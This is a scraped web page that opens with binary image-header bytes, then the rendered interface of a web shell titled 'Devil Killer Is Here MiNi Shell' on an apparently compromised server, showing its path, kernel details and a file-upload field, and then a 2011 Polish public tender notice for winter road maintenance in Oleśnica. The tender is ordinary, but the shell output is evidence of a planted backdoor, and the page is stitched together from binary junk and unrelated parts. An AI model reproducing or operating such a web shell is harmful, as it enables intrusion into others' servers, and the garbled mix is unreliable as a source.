JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110124/26915-N-2011.html

<p class="kh_header"><b>Oleśnica: Zimowe utrzymanie dróg powiatowych i wojewódzkich w sezonie 2010/2011 dla Zarządu Dróg Powiatowych w Oleśnicy - przetarg II</b><br>
<b>Numer ogłoszenia: 26915 - 2011; data zamieszczenia: 24.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oleśnicy , ul. Wojska Polskiego 52c, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3981667, 3993244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp-olesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych i wojewódzkich w sezonie 2010/2011 dla Zarządu Dróg Powiatowych w Oleśnicy - przetarg II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający dopuszcza możliwość składania ofert częściowych - liczba części: 13,
to jest ofert na świadczenie usług dowolną liczbą pojazdów / sprzętu wraz z obsługą, jednak pojazd / sprzęt wraz z obsługą zapisany w ofercie w jednej części  nie może stanowić części składowej innej części zamówienia.
2. Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zimowe utrzymanie dróg powiatowych i wojewódzkich dla Zarządu Dróg Powiatowych w Oleśnicy - sezon 2010/2011 - przetarg II.
W ramach poszczególnych części, Wykonawca zobowiązuje się przygotować do wykonania przedmiotu zamówienia pojazd - sprzęt wraz z obsługą kierowcy - operatora.
Zamawiający zastrzega sobie prawo do zmiany terenu działania poszczególnych obwodów drogowych jak i do ograniczenia ilości przedmiotu zamówienia oraz sprzętu.
Zamówienie składa się z 13 części, które będą realizowane na terenie działania Obwodu Drogowego w Oleśnicy i Obwodu Drogowego w Sycowie.
Każda z 13 części podzielona została na niezbędny sprzęt do realizacji przedmiotu zamówienia, tj:
1) teren działania obwodu drogowego w Oleśnicy, (część nr: 1 - 7):
Część nr 1
- Samochód ciężarowy do piaskarki ŚNIEŻKA z pługiem PO-97,
ładowność: pow. 15 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy:sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 2
- Samochód ciężarowy do piaskarki ŚNIEŻKA z pługiem PDP-A2700,
ładowność: pow. 15 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 3
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,
ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 4
- Samochód ciężarowy wraz z piaskarką o pojemności : od 4,5 do 7 m3 oraz z pługiem, o szerokości odśnieżania od 2,7 do 3,2 m.
które są w dyspozycji Wykonawcy, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 5
- Ładowarka czołowa, pojemność łyżki: min. 2 m3, szt. 1, która jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 150 godz.
Część nr 6
- Ładowarka czołowa, pojemność łyżki: min. 4,5 m3, szt. 1, która jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 50 godz.
Część nr 7
- Spychacz wraz z zestawem niskopodwoziowym, całkowity ciężar spychacza 18-20 t, szt. 1, który jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 50 godz.

2) teren działania obwodu drogowego w Sycowie, (część nr: 8 - 13):
Część nr 8
- Samochód ciężarowy do piaskarki PP-1 z pługiem PO-97SL,
ładowność: pow. 13 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 9
- Samochód ciężarowy do piaskarki PP-1 z pługiem PDP,
ładowność: pow. 13 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 10
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,
ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 11
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,
ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz.
Część nr 12
- Samochód ciężarowy do pługa PJ10,
ładowność: pow. 14 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 100 godz.
Część nr 13
- Ładowarka czołowa, pojemność łyżki: min. 2 m3, szt. 1, która jest  w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 150 godz.
Opis przedmiotu zamówienia zawiera specyfikacja techniczna - załącznik do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania potencjałem technicznym niezbędnym do wykonania zamówienia, Wykonawca winien dysponować sprawnymi  pojazdami - sprzętem w ilości zgodnej z ofertą:
część nr. 1: Samochód ciężarowy, ładowność: pow. 15 t, szt. 1,
część nr. 2: Samochód ciężarowy, ładowność: pow. 15 t, szt. 1,
część nr. 3: Samochód ciężarowy, ładowność: pow. 8 t, szt. 1,
część nr. 4: Samochód ciężarowy z piaskarką, pojemność od 4,5 do 7 m3 z pługiem, szer. odśnieżania : 2,7 do 3,2 m.
część nr. 5: Ładowarka czołowa, pojemność łyżki: min. 2 m3, szt. 1,
część nr. 6: Ładowarka czołowa, pojemność łyżki: min. 4,5 m3, szt. 1,
część nr. 7: Spychacz z zestawem niskopodwoziowym, całkowity ciężar spychacza 18-20 ton, szt. 1,
część nr. 8: Samochód ciężarowy, ładowność: pow. 13 t, szt. 1,
część nr. 9: Samochód ciężarowy, ładowność: pow. 13 t, szt. 1,
część nr. 10: Samochód ciężarowy, ładowność: pow. 8 t, szt. 1,
część nr. 11: Samochód ciężarowy, ładowność: pow. 8 t, szt. 1,
część nr. 12: Samochód ciężarowy, ładowność: pow. 14 t, szt. 1,
część nr. 13: Ładowarka czołowa, pojemność łyżki: min. 2 m3, szt. 1.
Wykonawca może polegać na zasobach niezbędnych do wykonania zamówienia innych podmiotów. W takim przypadku Wykonawca winien udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia -nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: Wykonawca winien dysponować min. 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia do kierowania pojazdami lub - oraz uprawnienia  operatora.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował takimi zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz oferty - zał. do SIWZ,
2) oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy - zał. do SIWZ,
3) wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - zał. do SIWZ,
4) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania - zał. do SIWZ,
5) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - zał. do SIWZ,
6) oświadczenie o braku podstaw do wykluczenia - zał. do SIWZ,
7) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy - zał. do SIWZ,
8) pełnomocnictwo - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, posiadające zakres i podpisane przez osoby reprezentujące Wykonawcę,
9) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada: dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert (art. 26 ust. 3 ustawy).
Oferty wykonawców spełniające powyższe warunki zostaną poddane ocenie zgodnie z kryteriami zawartymi w niniejszej SIWZ.
10) Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
11) Zgodnie z art. 23 ust 1 ustawy PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia.
12) W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w	postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty. Zamawiający dopuszcza złożenie pełnomocnictwa w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.
13).W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w pkt. 6), 7) musi dołączyć każdy podmiot występujący wspólnie. Oświadczenie	wymienione w pkt 2 Wykonawcy mogą złożyć wspólnie na jednym dokumencie, lub każdy z nich na odrębnym dokumencie, w zakresie spełnianych przez nich warunków określonych w art. 22 ust. 1 ustawy PZP.
14) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 7) składa odpowiednio dokumenty wymienione w § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane. Dokumenty sporządzone w języku obcym są składane w formie oryginału, odpisu, wypisu lub kopii wraz z tłumaczeniem na język polski.
15) Jeżeli Wykonawca nie złoży wymaganych dokumentów, oświadczeń czy pełnomocnictw lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub wykluczona z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy PZP. Zgodnie z art. 24 ust. 4 ustawy PZP ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Projekt umowy stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2. Zamawiający przewiduje wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
2.1. Zmiana terminu realizacji przedmiotu umowy.
1) Zmiany spowodowane warunkami atmosferycznymi, geologicznymi;
2.2. Zmiany osobowe.
1) Zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się, co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym;
2) Zamiana osób do nadzorowania zadania.
2.3. Pozostałe zmiany.
1) Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
2) Zmiany stawki podatku VAT wynikającej z odrębnych przepisów;
3) Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-olesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oleśnicy
ul. Wojska Polskiego 52c, 56-400 Oleśnica, Pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2011 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oleśnicy
ul. Wojska Polskiego 52c, 56-400 Oleśnica, Pokój nr 3 - I piętro - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1
- Samochód ciężarowy do piaskarki ŚNIEŻKA z pługiem PO-97,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 15 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy:sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
